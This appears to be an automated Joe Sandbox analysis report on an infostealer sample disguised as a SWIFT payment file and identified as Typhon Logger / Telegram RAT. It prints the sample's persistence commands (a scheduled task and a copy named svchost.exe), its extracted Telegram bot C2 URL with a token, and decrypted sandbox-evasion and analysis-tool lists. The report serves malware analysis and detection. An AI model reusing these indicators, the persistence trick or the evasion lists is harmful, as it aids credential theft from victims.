Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SWIFT_USD_165092.exe

Overview

General Information

Sample Name:SWIFT_USD_165092.exe
Analysis ID:872897
MD5:22ba147ed50ff44941fe486426432115
SHA1:a113bcca40c9c420442533589311a74ef0e30e96
SHA256:bebd7434928eb7d1fb89a84ba41c3838fb5734f446b58b8bfb2d5dddf48e518b
Tags:exe
Infos:

Detection

Typhon Logger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Sigma detected: Schedule system process
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for dropped file
Yara detected Typhon Logger
.NET source code references suspicious native API functions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Contains functionality to log keystrokes (.Net Source)
Uses the Telegram API (likely for C&C communication)
Contains functionality to register a low level keyboard hook
Machine Learning detection for sample
May check the online IP address of the machine
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Sample uses string decryption to hide its real strings
Uses schtasks.exe or at.exe to add and modify task schedules
Drops PE files with benign system names
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries information about the installed CPU (vendor, model number etc)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Checks if the current process is being debugged
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

Process Tree

  • System is w10x64
  • SWIFT_USD_165092.exe (PID: 5764 cmdline: C:\Users\user\Desktop\SWIFT_USD_165092.exe MD5: 22BA147ED50FF44941FE486426432115)
    • SWIFT_USD_165092.exe (PID: 5640 cmdline: C:\Users\user\Desktop\SWIFT_USD_165092.exe MD5: 22BA147ED50FF44941FE486426432115)
      • tasklist.exe (PID: 7068 cmdline: tasklist MD5: 6B7D2FC3FB98B10A5F77B23DEF745F6F)
        • conhost.exe (PID: 4724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6960 cmdline: C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Credit Cards MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 7100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 4996 cmdline: C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Cookies MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 4804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 2372 cmdline: C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Autofills MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 2312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 2832 cmdline: C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\404d522a-62f5-4eb2-91f4-202649d15261 MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 1716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 4724 cmdline: C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023 MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 4576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • WerFault.exe (PID: 5760 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5640 -s 3108 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • cmd.exe (PID: 7008 cmdline: cmd.exe" /C mkdir "C:\Users\user\AppData\Roaming\svchost MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 6992 cmdline: "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 760 cmdline: schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f MD5: 15FF7D8324231381BAD48A052F85DF04)
    • cmd.exe (PID: 4744 cmdline: cmd.exe" /C copy "C:\Users\user\Desktop\SWIFT_USD_165092.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 5716 cmdline: C:\Users\user\AppData\Roaming\svchost\svchost.exe MD5: 22BA147ED50FF44941FE486426432115)
    • svchost.exe (PID: 5484 cmdline: C:\Users\user\AppData\Roaming\svchost\svchost.exe MD5: 22BA147ED50FF44941FE486426432115)
      • tasklist.exe (PID: 4768 cmdline: tasklist MD5: 6B7D2FC3FB98B10A5F77B23DEF745F6F)
        • conhost.exe (PID: 4136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 7132 cmdline: C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Credit Cards MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 1516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 996 cmdline: C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Cookies MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 4504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 5220 cmdline: C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Autofills MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 4436 cmdline: C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\88560075-49ce-438f-ba24-9980eb388270 MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 2372 cmdline: C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023 MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 2832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 4756 cmdline: cmd.exe" /C mkdir "C:\Users\user\AppData\Roaming\svchost MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5740 cmdline: "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 3016 cmdline: schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f MD5: 15FF7D8324231381BAD48A052F85DF04)
    • cmd.exe (PID: 256 cmdline: cmd.exe" /C copy "C:\Users\user\AppData\Roaming\svchost\svchost.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • msiexec.exe (PID: 6876 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)
  • svchost.exe (PID: 6708 cmdline: C:\Users\user\AppData\Roaming\svchost\svchost.exe MD5: 22BA147ED50FF44941FE486426432115)
    • svchost.exe (PID: 2332 cmdline: C:\Users\user\AppData\Roaming\svchost\svchost.exe MD5: 22BA147ED50FF44941FE486426432115)
      • tasklist.exe (PID: 920 cmdline: tasklist MD5: 6B7D2FC3FB98B10A5F77B23DEF745F6F)
        • conhost.exe (PID: 3480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 204 cmdline: cmd.exe" /C mkdir "C:\Users\user\AppData\Roaming\svchost MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 2448 cmdline: "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 4980 cmdline: schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f MD5: 15FF7D8324231381BAD48A052F85DF04)
    • cmd.exe (PID: 5732 cmdline: cmd.exe" /C copy "C:\Users\user\AppData\Roaming\svchost\svchost.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Typhon Logger

{"C2 url": "https://api.telegram.org/bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendMessage?chat_id=1689002171"}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendMessage"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.651681057.0000000002EF9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
    0000000E.00000002.651681057.0000000002EF9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TyphonLoggerYara detected Typhon LoggerJoe Security
      0000000E.00000002.651681057.0000000002E91000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000001.00000002.524320725.00000000028A9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000001.00000002.524320725.00000000028A9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TyphonLoggerYara detected Typhon LoggerJoe Security
            Click to see the 18 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.SWIFT_USD_165092.exe.4068d70.1.unpackJoeSecurity_TyphonLoggerYara detected Typhon LoggerJoe Security
              0.2.SWIFT_USD_165092.exe.4068d70.1.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.SWIFT_USD_165092.exe.4068d70.1.unpackINDICATOR_SUSPICIOUS_References_SecTools_B64EncodedDetects executables referencing many base64-encoded IR and analysis tools namesditekSHen
                • 0x1ffbff:$s12: d2lyZXNoYXJr
                • 0x1ffd15:$s21: eDY0ZGJn
                • 0x1ffcf3:$s22: eDMyZGJn
                • 0x1ffadf:$s23: ZG5zcHk
                • 0x1ffaa3:$s24: ZGU0ZG90
                • 0x1ffac5:$s25: aWxzcHk
                0.2.SWIFT_USD_165092.exe.3e61140.0.unpackJoeSecurity_TyphonLoggerYara detected Typhon LoggerJoe Security
                  0.2.SWIFT_USD_165092.exe.3e61140.0.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    Click to see the 13 entries

                    Sigma Signatures

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Schedule system process
                    Source: Process startedAuthor: Joe Security: Data: Command: "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f, CommandLine: "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\Desktop\SWIFT_USD_165092.exe, ParentImage: C:\Users\user\Desktop\SWIFT_USD_165092.exe, ParentProcessId: 5764, ParentProcessName: SWIFT_USD_165092.exe, ProcessCommandLine: "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f, ProcessId: 6992, ProcessName: cmd.exe

                    Snort Signatures

                    No Snort rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackMalware Configuration Extractor: Typhon Logger {"C2 url": "https://api.telegram.org/bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendMessage?chat_id=1689002171"}
                    Source: SWIFT_USD_165092.exe.5640.1.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendMessage"}
                    Multi AV Scanner detection for submitted file
                    Source: SWIFT_USD_165092.exeReversingLabs: Detection: 32%
                    Source: SWIFT_USD_165092.exeVirustotal: Detection: 35%Perma Link
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeReversingLabs: Detection: 32%
                    Machine Learning detection for sample
                    Source: SWIFT_USD_165092.exeJoe Sandbox ML: detected
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeJoe Sandbox ML: detected
                    Sample uses string decryption to hide its real strings
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: 1
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: EMPTY
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: 0
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: T
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: @@@ SMTP @@@
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: 5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: 1689002171
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: /eO5Wu0o3jBo7Qi1UeCW9eyxMtXnw8iw/UHRs8WHiTxrobIAH9bZcY5x8gT6FyBh00JY/BJdh6DvKOnJit0bdC0XKc2bUc3b8xK/BJDJYPomdL/ya0Q0R2SqqAOFlU6ySvVplhHRyqQ2cfF2Ss2R8NEMRHTZxYyW3ktDsxS/SOTbae6dDFlaUlfq4sfcrHhIiGXebAcihs7Kzw==
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: v1.0
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: v1.0.1
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: [{0:dd.MM.yyyyy HH.mm.ss}]={1}@{2}_{3}
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: .zip
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: /c rmdir /S /Q "
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: "
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: cmd.exe
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: im_going_insane
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Analysis detected on
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: @
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: _
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Possible instance already running.
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Error on client!!!{0}
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: .bat
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: TaxxxxsxxxkxxxKilxlx /Fx x/IxM xx
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: x
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Tixxxmxxeoxxxut /Tx x2xxx /Nxxxoxbxrexxxxakx
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: /C
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: --debug
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Detonate.exe
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor:
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: IT-ADMIN
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Paul Jones
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: WALKER
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Sandbox
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: timmy
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: MalWorkstation
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: tim
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: vmware
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: sandbox
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: sand box
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: maltest
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: malware
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: virus
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: John Doe
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Emily
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: CurrentUser
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: JohnDoe
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: WDAGUtilityAccount
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Frank
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: JOHN-PC
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Peter Wilson
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: TVM
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \\.\root\cimv2
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: SELECT * FROM Win32_ComputerSystem
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Model
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: oracle
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: virtualbox
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: microsoft
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: virtual
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: hyper-v
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: xen
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: red hat
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: kvm
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ollydbg.exe
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: processhacker.exe
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: tcpview.exe
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: autoruns.exe
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: de4dot.exe
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ilspy.exe
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: dnspy.exe
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: autorunsc.exe
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: filemon.exe
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: procmon.exe
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: regmon.exe
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: idaq.exe
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: idaq64.exe
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: immunitydebugger.exe
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: wireshark.exe
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: dumpcap.exe
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: hookexplorer.exe
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: lordpe.exe
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: petools.exe
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: resourcehacker.exe
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: x32dbg.exe
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: x64dbg.exe
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: fiddler.exe
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: vmware svga
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: detonate.exe
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: https://api.telegram.org/bot
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: /sendMessage?chat_id=
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: &text=
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: New TyphonLogger log!---------------------Username:
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Machine name:
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: HWID:
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: IP address:
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ---------------------Build Tag:
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ---------------------Your logs are in the ZIP file being uploaded.Thank you for using TyphonLogger!https://t.me/typhon_shop
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: /send
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ?chat_id=
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: SMTP exfiltration method is not added yet.
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Likely old victim; Startup file not updated
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: New victim; Successfully installed to startup
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Error determining old or new victim; Not installed to startup
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Likely old victim; Registry key not updated
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: New victim; Successfully installed
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Error determining old or new victim; Registry not changed
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ???
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: .exe
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Microsoft\Windows\Start Menu\Programs\Startup
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ================Drive name : {0}Drive type : {1}Total drive size : {2} GBIs drive ready : {3}Drive format : {4}================
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Drive Info.txt
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: 1af0D797r2Iyt1D6TKua5uGsbZH6vpnoshKN65nU62kv+P1cEsvCbPMfu1b2
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: 1brpEqJmsn8vqk3nUbaHj6XhOMOpo+i66EjVpIS/53Qy5eBBD9bfce4Cpkv2
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: 1bqGXOdm/Tkv/gWiUfTCqKixO8m+78uy6ErCpYSGuHRmraVBQpeNOqtWpkv2
